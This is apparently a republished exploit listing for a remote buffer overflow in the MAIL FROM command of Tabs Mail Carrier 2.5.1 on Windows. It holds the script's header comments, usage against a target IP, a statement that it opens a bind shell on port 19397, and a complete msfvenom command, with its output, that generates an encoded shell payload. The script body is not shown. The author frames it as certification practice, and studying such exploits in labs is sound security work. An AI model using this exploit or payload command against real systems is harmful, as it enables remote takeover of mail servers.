Mail carrier 2.5.1 mail from buffer overflow Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2019-03-15 | Type: remote | Platform: windows
This exploit / vulnerability (Mail carrier 2.5.1 mail from buffer overflow) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow
# Date: March 14, 2019
# Exploit Author: Joseph McDonagh
# Vendor Homepage: N/A
# Software Link: N/A
# Version: Mail Carrier 2.5.1
# Tested on: Windows Vista Home Basic SP2
# CVE: None
#!/usr/bin/python
#
# This script started from PWK, Chapter 6
# I am re-purposing it for Tabs Mail Carrier 2.5.1 OSCE practice
# During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow
# Thanks to the original authors of the EHLO parameter, gave me the starting point and nudge I needed
#
# Usage ./tabs_mail.pwn.py 192.168.1.66
# Bind shell on TCP port 19397
# Tested on Windows Vista Home Basic SP 2
#msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='\x00' -e x86/shikata_ga_nai -f py | sed 's/buf/pay/g'
#[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
#[-] No arch selected, selecting arch: x86 from the payload
#Found 1 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of py file: 1710 bytes